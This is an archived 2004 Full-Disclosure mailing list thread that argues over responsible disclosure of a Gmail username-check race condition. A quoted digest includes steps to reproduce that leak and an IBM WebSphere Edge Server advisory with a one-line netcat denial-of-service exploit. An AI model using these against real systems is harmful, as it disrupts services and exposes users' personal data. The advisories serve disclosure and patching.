> |The correct channel to post such "bugs" is the
> Gmail contact link for "bug
> |reports".
>
> I have already contacted Gmail about 10 days ago,
> but I have not received any
> replies till this moment.
>
> |If you had waited until the Gmail dev team declared
> gmail a public release,
> |you would have gained more respect in the security
> community scene.
>
> I don't think this is about respect afterall.
>
> Regards,
> Ahmed Motaz
>
>
------------------------------------------------------
> Mailsurf.com your communication portal for SMS,
> Email, Fax, E-Cards and more. www.mailsurf.com
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter:
> http://lists.netsys.com/full-disclosure-charter.html
>
>
> ---------------------------------
> Do you Yahoo!?
> Yahoo! Mail - Helps protect you from nasty viruses.

                
__________________________________
Do you Yahoo!?
Yahoo! Mail - 50x more storage than other providers!
http://promotions.yahoo.com/new_mail

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] Gmail Information Disclosure Vulnerability

From: Tremaine (tremainegmail.com)
Date: Mon Jul 05 2004 - 09:46:16 CDT

It's about posting security advisories. The initial poster advises
they notified the gmail team, and posted this advisory 10 days later.

It is immaterial whether an application is in alpha, beta or
production. If the software or application is in use outside the
development team, and there is a security issue, it is relevant to
this list.

It's called Full Disclosure for a reason... not partial disclosure,
not disclosure of production applications only... Full Disclosure.

If you want partial disclosure, you may need to rethink your
subscription to the list.

--
Tremaine
IT Security Consultant

----- Original Message -----
From: System Outage <system_outageyahoo.com>
Date: Mon, 5 Jul 2004 06:46:42 -0700 (PDT)
Subject: Re: [Full-Disclosure] Gmail Information Disclosure Vulnerability
To: full-disclosurelists.netsys.com

If it's not about respect then what is it about?
 
You have no respect for the Gmail Team, that's for sure.
 
I guess this list isn't about respect...
 
It's about kiddies posting advisories and exploits for fun and little
care for the vendor(s).
 
 
Cheerio

 

amforwardmailsurf.com wrote:
System Outage wrote:

|The correct channel to post such "bugs" is the Gmail contact link for "bug
|reports".

I have already contacted Gmail about 10 days ago, but I have not received any
replies till this moment.

|If you had waited until the Gmail dev team declared gmail a public release,
|you would have gained more respect in the security community scene.

I don't think this is about respect afterall.

Regards,
Ahmed Motaz

------------------------------------------------------
Mailsurf.com your communication portal for SMS,
Email, Fax, E-Cards and more. www.mailsurf.com

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

________________________________
Do you Yahoo!?
Yahoo! Mail - Helps protect you from nasty viruses.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] Gmail Information Disclosure Vulnerability

From: Syke (sykemantissecurity.net)
Date: Mon Jul 05 2004 - 09:20:30 CDT

System Outage wrote:

> If it's not about respect then what is it about?
>
> You have no respect for the Gmail Team, that's for sure.
>
> I guess this list isn't about respect...
>
> It's about kiddies posting advisories and exploits for fun and little
> care for the vendor(s).
>
>
> Cheerio
>
>
> */amforwardmailsurf.com/* wrote:
>
> System Outage wrote:
>
> |The correct channel to post such "bugs" is the Gmail contact link
> for "bug
> |reports".
>
> I have already contacted Gmail about 10 days ago, but I have not
> received any
> replies till this moment.
>
> |If you had waited until the Gmail dev team declared gmail a
> public release,
> |you would have gained more respect in the security community scene.
>
> I don't think this is about respect afterall.
>
> Regards,
> Ahmed Motaz
>
> ------------------------------------------------------
> Mailsurf.com your communication portal for SMS,
> Email, Fax, E-Cards and more. www.mailsurf.com
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
>
> ------------------------------------------------------------------------
> Do you Yahoo!?
> Yahoo! Mail
> <http://us.rd.yahoo.com/mail_us/taglines/virus/*http://promotions.yahoo.com/new_mail/static/protection.html>
> - Helps protect you from nasty viruses.

 Not everything is about respect. Although if that's your outlook on
life, then I pity you for your ego must be the size of Michigan. After
all, if you didn't have the *full* in full-disclosure, this would be
just an ordinary, boring list.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] Web sites compromised by IIS attack

From: Akos Szalkai (szalkai2fkft.com)
Date: Mon Jul 05 2004 - 09:43:31 CDT

On Thu, Jul 01, 2004 at 06:09:05AM -0400, Valdis.Kletnieksvt.edu created magic using only numbers:
> On Wed, 30 Jun 2004 21:08:27 CDT, Paul Schmehl <paulsutdallas.edu> said:
>
> > I attended a presentation yesterday for a security product in the
> > application firewall field. During the presentation, the CISSP stated that
> > "in every 1000 lines of code there will be 15 errors".
>
> Actually, I suspect most coders are *worse* than that.

You may be right, but your calculations are an order of magnitude off. :)

> Sendmail 8.13.0 weighs in at just about 90K lines of C code for
> the main program. By that metric, there should only have been 135
> bugs in it. In fact, there are 441 occurrences of 'Problem noted by'
> in the release notes.

Maybe you were not really awake yet (look at the Date header!), but if
its 15 errors/KLOC, then 90K lines of code should have 90*15=1350 bugs,
not 9*15=135.

You made the same mistake with BIND. I do not like those two pieces of
software, but this time you showed that the Sendmail/BIND people are
better than the average programmer.

Akos

--
Akos Szalkai <szalkai2f.hu>
Principal IT Consultant, CISA
2F 2000 Szamitastechnikai es Szolgaltato Kft.
Tel: (+36-1)-4887700 Fax: (+36-1)-4887709 WWW: http://www.2f.hu/

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
RE: [Full-Disclosure] Gmail Information Disclosure Vulnerability

From: Mark Laurence (m.laurencegroveindependentschool.co.uk)
Date: Mon Jul 05 2004 - 09:13:28 CDT

"You have no respect for the Gmail Team, that's for sure."
Why would he? Respect is earned not given for free.
 
"It's about kiddies posting advisories and exploits for fun and little care
for the vendor(s)."
No the reason they are generally supposed to be posted AFAIK is so that the
secuirty concious user is aware and can take steps to prevent them from
being exploited. Granted reasonable steps should be taken to contact the
vendor, if they dont respond then what can one do?
 
Thanks
Mark
 

   _____

From: full-disclosure-adminlists.netsys.com
[mailto:full-disclosure-adminlists.netsys.com] On Behalf Of System Outage
Sent: 05 July 2004 14:47
To: full-disclosurelists.netsys.com
Subject: Re: [Full-Disclosure] Gmail Information Disclosure Vulnerability

If it's not about respect then what is it about?
 
 
 
I guess this list isn't about respect...
 
It's about kiddies posting advisories and exploits for fun and little care
for the vendor(s).
 
 
Cheerio
 

amforwardmailsurf.com wrote:

System Outage wrote:

|The correct channel to post such "bugs" is the Gmail contact link for "bug
|reports".

I have already contacted Gmail about 10 days ago, but I have not received
any
replies till this moment.

|If you had waited until the Gmail dev team declared gmail a public release,

|you would have gained more respect in the security community scene.

I don't think this is about respect afterall.

Regards,
Ahmed Motaz

------------------------------------------------------
Mailsurf.com your communication portal for SMS,
Email, Fax, E-Cards and more. www.mailsurf.com

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

   _____

Do you Yahoo!?
HYPERLINK
"http://us.rd.yahoo.com/mail_us/taglines/virus/*http://promotions.yahoo.com/
new_mail/static/protection.html"Yahoo! Mail - Helps protect you from nasty
viruses.

---
Incoming mail is certified Virus Free.
Checked by AVG anti-virus system (http://www.grisoft.com).
Version: 6.0.656 / Virus Database: 421 - Release Date: 09/04/2004

---
Outgoing mail is certified Virus Free.
Checked by AVG anti-virus system (http://www.grisoft.com).
Version: 6.0.656 / Virus Database: 421 - Release Date: 09/04/2004
 

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
[Full-Disclosure] Re: Full-Disclosure digest, Vol 1 #1747 - 32 msgs

philipp.freibergerbrodos.de
Date: Mon Jul 05 2004 - 10:33:05 CDT

und mir fällt dazu auch nur google ein...

sorry... aber sobald es an "bunte" sachen geht hab ich kein plan mehr...

mfg Philipp
ps: ich hab mich am So. den ganzen tag mit meinem X geprügelt damit es das macht was es soll - da kommt man sich vor als hätte man noch nie Linux gesehen... :)

-------- Original Message --------
Subject: Full-Disclosure digest, Vol 1 #1747 - 32 msgs (05-Jul-2004 16:48)
From: full-disclosure-requestlists.netsys.com
To: philipp.freibergerbrodos.de

> Send Full-Disclosure mailing list submissions to
> full-disclosurelists.netsys.com
>
> To subscribe or unsubscribe via the World Wide Web, visit
> http://lists.netsys.com/mailman/listinfo/full-disclosure
> or, via email, send a message with subject or body 'help' to
> full-disclosure-requestlists.netsys.com
>
> You can reach the person managing the list at
> full-disclosure-adminlists.netsys.com
>
> When replying, please edit your Subject line so it is more specific
> than "Re: Contents of Full-Disclosure digest..."
>
>
> Today's Topics:
>
> 1. Re: Public Review of OIS Security Vulnerability
> Reporting and Response Guidelines (dave)
> 2. Re:Bugtraq Security Systems (bitlance winter)
> 3. RE: The "Drew Copley is a prick" Poll update
> [Time to Grow Up] (Mortis)
> 4. Gmail Information Disclosure Vulnerability (amforwardmailsurf.com)
> 5. Re: Public Review of OIS Security Vulnerability Reporting and
> ResponseGuidelines (Fred Mobach)
> 6. [ GLSA 200407-03 ] Apache 2: Remote denial of service attack (Thierry
> Carrez)
> 7. [ GLSA 200407-04 ] Pure-FTPd: Potential DoS when maximum connections
> is reached (Thierry Carrez)
> 8. Re: Web sites compromised by IIS attack (Jason Coombs)
> 9. Re: Gmail Information Disclosure Vulnerability (System Outage)
> 10. Re: Re:Bugtraq Security Systems (System Outage)
> 11. Re:Bugtraq Security Systems (Boggles)
> 12. RE: IE Web Browser: "Sitting Duck" (joe)
> 13. Re: Gmail Information Disclosure Vulnerability (D.J. Capelis)
> 14. RE: [Dailydave] Re: [Full-Disclosure] Public Review of OIS Security
> Vulnerability Reporting and Response Guidelines (Steve W. Manzuik)
> 15. Re: Gmail Information Disclosure Vulnerability (amforwardmailsurf.
> com)
> 16. Re: Gmail Information Disclosure Vulnerability (Rudolf Polzer)
> 17. XSS in 12Planet Chat Server 2.9 (Donato Ferrante)
> 18. Re: HP urges users to erase Netscape to avoid security
> problems (Szilveszter Adam)
> 19. Huge amounts of Citipank phishing spam seen this weekend. (Feher
> Tamas)
> 20. CYBSEC - Security Advisory: Denial of Service in IBM WebSphere
> Edge Server (Leandro Meiners)
> 21. Unreal ircd 3.2 clocking subsystem vulnerability (bartavelle)
> 22. Re: [FD] VERY HIGH VULNERABILITY DISCLOSURE !!! MASS ROOT POSSIBLE !!!
> PLEASE BE ATTENTIVE !!! (Thomas Binder)
> 23. Re: Public Review of OIS Security Vulnerability Reporting and
> Response Guidelines (Georgi Guninski)
> 24. Re: Huge amounts of Citipank phishing spam seen this weekend. (Duncan
> Hill)
> 25. Re: Gmail Information Disclosure Vulnerability (System Outage)
> 26. RE: Gmail Information Disclosure Vulnerability (Mark Laurence)
>
> --__--__--
>
> Message: 1
> Date: Sun, 04 Jul 2004 13:18:35 -0400
> From: dave <daveimmunitysec.com>
> To: OIS <announcementsoisafety.org>
> CC: bugtraqsecurityfocus.com, NTBUGTRAQLISTSERV.NTBUGTRAQ.COM,
> full-disclosurelists.netsys.com
> Subject: Re: [Full-Disclosure] Public Review of OIS Security Vulnerability
> Reporting and Response Guidelines
>
> Nobody trusts the OIS or its motives. I imagine this is similar to the
> feedback you've gotten from everyone else as well, but Immunity has no
> plans to subscribe to your guidelines, and is going to oppose any
> efforts you make to legislate those guidelines as law. In section 1.1
> the draft proposes that the purpose of the OIS's model is to protect
> systems from vulnerabilities. This is fairly obviously untrue - the
> purpose of the OIS is to lobby towards a business model for Microsoft
> and the other OIS members that involves the removal of non-compliant
> security researchers.
>
> This call for feedback is a thinly disguised attempt to get public
> legitimacy and allow the OIS to claim it has community backing, which it
> clearly does not.
>
> It's rare, but there are still security companies and individuals who do
> not owe their entire business to money from Microsoft. It's July 4th.
> and some of us are Americans who understand the concept of independance.
>
> Dave Aitel
> Immunity, Inc.
>
>
>
>
> OIS wrote:
>
> > -----BEGIN PGP SIGNED MESSAGE-----
> > Hash: SHA1
> >
> > The Organization for Internet Safety (OIS) extends an invitation to
> > the readers of the BugTraq, NTBugtraq, and Full-Disclosure mailing
> > lists to participate in the ongoing public review of the OIS Security
> > Vulnerability Reporting and Response Guidelines.
> > The OIS reviews the Guidelines annually to ensure that they remain
> > useful and relevant to the security community and, most importantly,
> > to the millions of computer users who are the ultimate beneficiaries
> > of effective computer security practices. Over the past year, OIS
> > has received feedback from many adopters of the Guidelines as well as
> > from several public-private partnerships, and have incorporated much
> > of this feedback into an interim version that is available at
> > http://www.oisafety.org/review/draft-1.5.pdf. We recommend reviewing
> > the interim version, but reviewers are welcome to provide feedback on
> > the original version at http://www.oisafety.org/reference/process.pdf
> > if they would like.
> >
> > For more information on the public review, please visit
> > http://www.oisafety.org/review-1.5.html. The closing date for the
> > review has been extended until 16 July 2004. We look forward to your
> > feedback.
> >
> > Regards,
> >
> > The Organization for Internet Safety
> > www.oisafety.org
> >
> > -----BEGIN PGP SIGNATURE-----
> > Version: PGP 8.0.3
> >
> > iQA/AwUBQOWQgbF9hclyvjnOEQIhmACfYlaHX2NnJbHUCaCYfMHO4tkGDh0AoMzz
> > KWNTvxgQVKXiC1OU9CR/rXYF
> > =4mT/
> > -----END PGP SIGNATURE-----
> >
> > _______________________________________________
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.netsys.com/full-disclosure-charter.html
>
>
>
>
> --__--__--
>
> Message: 2
> From: "bitlance winter" <bitlance_3hotmail.com>
> To: full-disclosurelists.netsys.com
> Date: Sun, 04 Jul 2004 17:36:50 +0000
> Subject: [Full-Disclosure] Re:Bugtraq Security Systems
>
> Who are YOU,Bugtraq Security Systems?
> Are YOU foo,bar.foobar?
> ;)
> YOU say LOVE,OK.
>
> [blockquote]
> "With burning brain and heart of hate,
> I sought my wronger, early, late,
> And all the wretched night and day
> My dream and thought was slay, and slay.
> My better self rose uppermost,
> The beast within my bosom lost
> Itself in love; peace from afar
> Shone o'er me radiant like a star.
> I Slew my wronger with a deed,
> A deed of love; I made him bleed
> With kindness, and I filled for years
> His soul with tenderness and tears."
>
> Let those who aim at the right life, who believe that they love Truth,
> cease
> to passionately oppose themselves to others, and let them strive to calmly
> and wisely understand them, and in thus acting toward others they will be
> conquering themselves; and while sympathizing with others, their own souls
> will be fed with the heavenly dews of kindness, and their hearts be
> strengthened and refreshed in the Pleasant Pastures of Peace.
> [/blockauote]
>
> Best Regards.
> --
> bitlance winter.
>
> _________________________________________________________________
> Is your PC infected? Get a FREE online computer virus scan from McAfeer
> Security. http://clinic.mcafee.com/clinic/ibuy/campaign.asp?cid=3963
>
>
> --__--__--
>
> Message: 3
> Date: Sun, 04 Jul 2004 14:17:07 -0400
> To: full-disclosurelists.netsys.com
> From: Mortis <m0rtisadelphia.net>
> Subject: RE: [Full-Disclosure] The "Drew Copley is a prick" Poll update
> [Time to Grow Up]
>
> I told you that would be more fun than fishing with dynamite.
>
> Plenty of fresh worms for a hungry turkey.
>
> Sort your mail box and go to town.
> --
> Libel-libel,
> Dan eel
> http://full-disclosure.50megs.com/
>
>
> --__--__--
>
> Message: 4
> Date: Sun, 4 Jul 2004 19:10:44 +0000
> From: amforwardmailsurf.com
> To: full-disclosurelists.netsys.com
> Subject: [Full-Disclosure] Gmail Information Disclosure Vulnerability
>
> This message is in MIME format.
>
> ---MOQ1088968244aa66ff8657f08d3292ceb7b3ae771de7
> Brief
> --------------
> While I was playing with Gmail, I found a bug that may disclose
> information about the users currently attempting to register a new
> Gmail account. This seems to be a vulnerability with low severity (at
> least until now).
>
> CheckAvailability Script
> --------------
> In the registration page, the "Check Availability" button queries a
> certain script, namely /accounts/CheckAvailability. The script takes
> the desired username, and checks if it is available. If it is not
> available, it suggests other usernames by contactenating, for example,
> your last name to it.
>
> The Problem
> --------------
> There seems to be a thread-safety problem with CheckAvailability
> script. When the script is under heavy stress, it may return answers
> to queries that are not yours, revealing others' desired usernames,
> and first and last names.(see attached screen shot)
>
>
> Reproduction
> --------------
> To reproduce it, you should:
>
> AND
> a. Have a valid Gmail invitation
> b. Frequently Invoke CheckAvailability by
> ~ OR
> ~ 1. Creating a tool that automates the script invocation.
> ~ 2. Having the patience and keep clicking the button frequently (this
> works too!).
>
>
> I have not yet carefully studied the script, but I think it might not
> be a problem with this script only, but others as well. Your thoughts
> are appreciated.
>
> Regards,
> Ahmed Motaz
>
> ------------------------------------------------------
> Mailsurf.com your communication portal for SMS,
> Email, Fax, E-Cards and more. www.mailsurf.com
>
> ---MOQ1088968244aa66ff8657f08d3292ceb7b3ae771de7
> Gmail service is in Beta. You have no credibility posting this advisory. =
> The correct channel to post such "bugs" is the Gmail contact link for "bu=
> g reports".=20
> =20
> If you weren't a script kiddie or scene whore, you would have known to ho=
> ld information until such a time that Gmail became a public service.
> =20
> Then and only then would anyone take this advisory seriously!
> =20
> You obviously have no understanding of the "Beta" state of a development.=
> The fact that a team of developers are in the state of "Beta" means that=
> the developers are fully aware the service may not be entirely secure an=
> d they wish feedback via Google's own beta "bug report" channels.
> =20
> All in all, this is a "beta bug report" and nothing else. If you had wai=
> ted until the Gmail dev team declared gmail a public release, you would h=
> ave gained more respect in the security community scene.
> =20
> Cheerio
> =20
> =20
>
> =09
> ---------------------------------
> Do you Yahoo!?
> Yahoo! Mail - 50x more storage than other providers!
> --0-509345037-1088977213=3D:9720
>
> A name like "Bugtraq Security Systems" Sounds like a typical name a scrip=
> t kiddie group or scene whore group would use to try and gain an easy nam=
> e within the scene.
>
> They (Bugtraq Security Systems) obviously thought... Hey.. "if we whore =
> a high profile name and make our website look professional, people will b=
> uy it and think we're elite".=20
>
> Lol, if you had any cred in the security community scene, you just lost i=
> t by mentioning the key words "Defcon" and "Drew Copley is a prick" refer=
> ences.
>
> All you are making yourself out to be is a jealous scene whore who wishes=
> they had the 0-day exclusives that Eyee Security obtain and you wish you=
> were as good as they are.=20
>
> You have no right to come on a high profile security mailing list with su=
> ch childish remarks towards a highly respected Security Group as Eyee. Go=
> find some "elite" zero day and come back when you manage to gain as much=
> respect as Eyee Security has within the security community scene.
>
> Cheerio
>
> __________________________________________________
> Do You Yahoo!?
> Tired of spam? Yahoo! Mail has the best spam protection around=20
> http://mail.yahoo.com=20
> --0-281874980-1088978667=3D:60119
> The following advisory is also available in pdf for download at
> http://www.cybsec.com/vuln/IBM-WebSphere-Edge-Server-DOS.pdf
>
> CYBSEC S.A.
> www.cybsec.com
>
> Advisory Name: Denial of Service in WebSphere Edge Server.
> Vulnerability Class: Denial of Service
> Release Date: June 2nd 2004
> Affected Applications: =20
>
> * WebSphere Edge Components Caching Proxy 5.02 using
> JunctionRewrite with UseCookiedirective.=20
>
> Not Affected Applications:=20
>
> * WebSphere Edge Components Caching Proxy 5.02 NOT using
> JunctionRewrite with UseCookie directive. =20
> * WebSphere Edge Components Caching Proxy 5.00
>
> Affected Platforms:=20
>
> * SUSE SLES 8=20
> * SUSE SLES 8 Service Pack 1=20
> * SUSE SLES 8 Service Pack 3=20
> * SUSE SLES 8 Service Pack 3=20
> * Apparently all platforms running WebSphere Edge Server
>
> Local / Remote: Remote
> Severity: High
> Author: Leandro Meiners.
> Vendor Status:=20
>
> * Fix included in WebSphere Application Server 5.0.3 (to be
> released)=20
> * Patch available from IBM for clients with Support Level 2 or 3
>
> Reference to Vulnerability Disclosure Policy:=20
> http://www.cybsec.com/vulnerability_policy.pdf
>
> Overview:
>
> WebSphere Edge Component Caching Proxy, part of WebSphere Application
> Sever, is a reverse proxy designed to reduce bandwidth use and improve a
> Web site's speed and reliability by providing a point-of-presence node
> for one or more back-end content servers. It is built to work with
> content provided by one or more backend WebSphere Application Servers.
>
> Vulnerability Description:
>
> The vulnerability discovered allows a remote attacker to generate a
> denial of service condition against the WebSphere Edge Component Caching
> Proxy.=20
>
> If the reverse proxy is configured with the JunctionRewrite directive
> being active, a remote attacker can trivially cause a denial of service
> by executing the GET HTTP method without parameters.
>
> Exploit:
>
> $ echo =B4GET=A1 | nc <victim_host_ip> <proxy_port>
>
> Solutions:
>
> If JunctionRewrite is unnecessary, disabling it will suffice to prevent
> the Denial of Service. Also if the option UseCookie in the
> JunctionRewrite directive is unnecessary disabling it will suffice to
> prevent the Denial of Service.
>
> Vendor Response:
>
> IBM opened a case regarding the vulnerability and provided a patch
> within 2 weeks of the initial contact.
>
> Contact Information:
>
> For more information regarding the vulnerability feel free to contact
> the author at lmeinerscybsec.com.
>
> For more information regarding CYBSEC: www.cybsec.com
>
>
> ----------------------------
> Leandro Meiners
> CYBSEC S.A. Security Systems
> E-mail: lmeinerscybsec.com
> Tel/Fax: [54-11] 4382-1600
> Web: http://www.cybsec.com
>
> --=-KxxekzTaBeyTiwzQ+aFI
> If it's not about respect then what is it about?=20
> =20
> You have no respect for the Gmail Team, that's for sure.
> =20
> I guess this list isn't about respect...
> =20
> It's about kiddies posting advisories and exploits for fun and little car=
> e for the vendor(s).
> =20
> =20
> Cheerio
> =20
>
> amforwardmailsurf.com wrote:
> System Outage wrote:
>
> |The correct channel to post such "bugs" is the Gmail contact link for "b=
> ug=20
> |reports".=20
>
> I have already contacted Gmail about 10 days ago, but I have not received=
> any=20
> replies till this moment.
>
> |If you had waited until the Gmail dev team declared gmail a public relea=
> se,=20
> |you would have gained more respect in the security community scene.
>
> I don't think this is about respect afterall.
>
> Regards,
> Ahmed Motaz
>
> ------------------------------------------------------
> Mailsurf.com your communication portal for SMS,
> Email, Fax, E-Cards and more. www.mailsurf.com
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
>
> =09
> ---------------------------------
> Do you Yahoo!?
> Yahoo! Mail - Helps protect you from nasty viruses.
> --0-223874168-1089035202=3D:27338
> "You have no respect for the Gmail Team, that's for sure."
> Why would he? Respect is earned not given for free.
> =20
> "It's about kiddies posting advisories and exploits for fun and little ca=
> re
> for the vendor(s)."
> No the reason they are generally supposed to be posted AFAIK is so that t=
> he
> secuirty concious user is aware and can take steps to prevent them from
> being exploited. Granted reasonable steps should be taken to contact the
> vendor, if they dont respond then what can one do?
> =20
> Thanks
> Mark
> =20
>
>
> _____ =20
>
> From: full-disclosure-adminlists.netsys.com
> [mailto:full-disclosure-adminlists.netsys.com] On Behalf Of System Outag=
> e
> Sent: 05 July 2004 14:47
> To: full-disclosurelists.netsys.com
> Subject: Re: [Full-Disclosure] Gmail Information Disclosure Vulnerability
>
>
> If it's not about respect then what is it about?=20
> =20
> =20
> =20
> I guess this list isn't about respect...
> =20
> It's about kiddies posting advisories and exploits for fun and little car=
> e
> for the vendor(s).
> =20
> =20
> Cheerio
> =20
>
> amforwardmailsurf.com wrote:
>
> System Outage wrote:
>
> |The correct channel to post such "bugs" is the Gmail contact link for "b=
> ug=20
> |reports".=20
>
> I have already contacted Gmail about 10 days ago, but I have not received
> any=20
> replies till this moment.
>
> |If you had waited until the Gmail dev team declared gmail a public relea=
> se,
>
> |you would have gained more respect in the security community scene.
>
> I don't think this is about respect afterall.
>
> Regards,
> Ahmed Motaz
>
> ------------------------------------------------------
> Mailsurf.com your communication portal for SMS,
> Email, Fax, E-Cards and more. www.mailsurf.com
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
>
>
>
>
> _____ =20
>
> Do you Yahoo!?
> HYPERLINK
> "http://us.rd.yahoo.com/mail_us/taglines/virus/*http://promotions.yahoo.c=
> om/
> new_mail/static/protection.html"Yahoo! Mail - Helps protect you from nast=
> y
> viruses.
>
>
> ---
> Incoming mail is certified Virus Free.
> Checked by AVG anti-virus system (http://www.grisoft.com).
> Version: 6.0.656 / Virus Database: 421 - Release Date: 09/04/2004
>
>
>
> ---
> Outgoing mail is certified Virus Free.
> Checked by AVG anti-virus system (http://www.grisoft.com).
> Version: 6.0.656 / Virus Database: 421 - Release Date: 09/04/2004
> =20
>
> ------=3D_NextPart_000_021E_01C462A2.A05CB230

To: full-disclosure-requestlists.netsys.com
    full-disclosurelists.netsys.com

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] Gmail Information Disclosure Vulnerability

From: System Outage (system_outageyahoo.com)
Date: Mon Jul 05 2004 - 11:00:20 CDT

If it's about posting advisories, why do many decide to post the exploit along with the advisory. To me this is not a responsible thing to do. Whoever knows how many script kiddies are sleeping on this list and taking advantage of the free exploit giveaway's seen here.
 
10 days isn't an awful long time and the vendor never made primary contact with the user in question. Meaning, for whatever reason the e-mail may not have been delivered and because of this the Gmail Team could easily of been caught short on this issue and a serious hole exposed to the public, before the vendor (Gmail) has had a chance to scramble together an incident response and get the hole patched out, before a serious number of account's become compromised on the service.
 
There is a difference between responsible "Full Disclosure" and irresponsible "Full Disclosure".
 
 
Cheerio
 
 

Tremaine <tremainegmail.com> wrote:
It's about posting security advisories. The initial poster advises
they notified the gmail team, and posted this advisory 10 days later.

It is immaterial whether an application is in alpha, beta or
production. If the software or application is in use outside the
development team, and there is a security issue, it is relevant to
this list.

It's called Full Disclosure for a reason... not partial disclosure,
not disclosure of production applications only... Full Disclosure.

If you want partial disclosure, you may need to rethink your
subscription to the list.

--
Tremaine
IT Security Consultant

----- Original Message -----
From: System Outage
Date: Mon, 5 Jul 2004 06:46:42 -0700 (PDT)
Subject: Re: [Full-Disclosure] Gmail Information Disclosure Vulnerability
To: full-disclosurelists.netsys.com

If it's not about respect then what is it about?

You have no respect for the Gmail Team, that's for sure.

I guess this list isn't about respect...

It's about kiddies posting advisories and exploits for fun and little
care for the vendor(s).

Cheerio

amforwardmailsurf.com wrote:
System Outage wrote:

|The correct channel to post such "bugs" is the Gmail contact link for "bug
|reports".

I have already contacted Gmail about 10 days ago, but I have not received any
replies till this moment.

|If you had waited until the Gmail dev team declared gmail a public release,
|you would have gained more respect in the security community scene.

I don't think this is about respect afterall.

Regards,
Ahmed Motaz

------------------------------------------------------
Mailsurf.com your communication portal for SMS,
Email, Fax, E-Cards and more. www.mailsurf.com

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

________________________________
Do you Yahoo!?
Yahoo! Mail - Helps protect you from nasty viruses.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

__________________________________________________
Do You Yahoo!?
Tired of spam? Yahoo! Mail has the best spam protection around
http://mail.yahoo.com

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] Gmail Information Disclosure Vulnerability

amforwardmailsurf.com
Date: Mon Jul 05 2004 - 12:33:10 CDT

System Outage wrote:
|...why do many decide to post the exploit along with the advisory.

I'd like to draw your attention to the fact that the accompanying code to the
advisories you talk about is usually not referred to as "exploits." These are
actually called "proof of concepts."

It's true some people misuse them, but these "exploits" do help greatly in
understanding the problem, finding more similar/related problems, and even
patching it/them.

|...a serious hole exposed to the public, before the vendor (Gmail) has had a
|chance to scramble |together an incident response and get the hole patched
|out, before a serious number of account's |become compromised on the service.

I agree with you. "Serious" holes should be reported to the vendor some time
before it's disclosed to public. Patience is a must in this case (not infinite
though). However, I don't think this applies to the thread we are talking
about. This is a vulnerability with very low severity. This is also a beta
service and you should use it at your own risk.

Aside from that,
I am, however, still concerned whether this vulnerability can be escalated to
higher severity. Could the same problem exist with other scripts? Can I edit my
profile, for example, and find someone else's profile, and perhaps his secret
answer?

Your thoughts are highly appreciated.

Regards,
Ahmed Motaz

------------------------------------------------------
Mailsurf.com your communication portal for SMS,
Email, Fax, E-Cards and more. www.mailsurf.com

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] Gmail Information Disclosure Vulnerability

From: Rodrigo Barbosa (rodrigobsuespammers.org)
Date: Mon Jul 05 2004 - 12:06:34 CDT

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

On Mon, Jul 05, 2004 at 09:00:20AM -0700, System Outage wrote:
> There is a difference between responsible "Full Disclosure" and irresponsible
> "Full Disclosure".

Responsible ... Thats rich. From someone who post anonymously,
from yahoo.com. Not to mention a very professional name of "System
Outage".

Why are you people even replying to this guy ?

- --
Rodrigo Barbosa <rodrigobsuespammers.org>
"Quid quid Latine dictum sit, altum viditur"
"Be excellent to each other ..." - Bill & Ted (Wyld Stallyns)

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.3 (GNU/Linux)

iD8DBQFA6YqapdyWzQ5b5ckRAnbNAJ9JnbpYygo19XmSYh8RAq5Cdwdp1wCgpsQG
63V+32iD5s7FTC0+r3zqEAc=
=Cxid
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] Gmail Information Disclosure Vulnerability

From: Eric LeBlanc (inoukigt.net)
Date: Mon Jul 05 2004 - 12:42:14 CDT

On Mon, 5 Jul 2004, System Outage wrote:

> If it's about posting advisories, why do many decide to post the exploit along with the advisory. To me this is not a responsible thing to do. Whoever knows how many script kiddies are sleeping on this list and taking advantage of the free exploit giveaway's seen here.
>
> 10 days isn't an awful long time and the vendor never made primary contact with the user in question. Meaning, for whatever reason the e-mail may not have been delivered and because of this the Gmail Team could easily of been caught short on this issue and a serious hole exposed to the public, before the vendor (Gmail) has had a chance to scramble together an incident response and get the hole patched out, before a serious number of account's become compromised on the service.
>
> There is a difference between responsible "Full Disclosure" and irresponsible "Full Disclosure".
>
>
> Cheerio
>
> Tremaine <tremainegmail.com> wrote:
> It's about posting security advisories. The initial poster advises
> they notified the gmail team, and posted this advisory 10 days later.
>
> It is immaterial whether an application is in alpha, beta or
> production. If the software or application is in use outside the
> development team, and there is a security issue, it is relevant to
> this list.
>
>
> It's called Full Disclosure for a reason... not partial disclosure,
> not disclosure of production applications only... Full Disclosure.
>
> If you want partial disclosure, you may need to rethink your
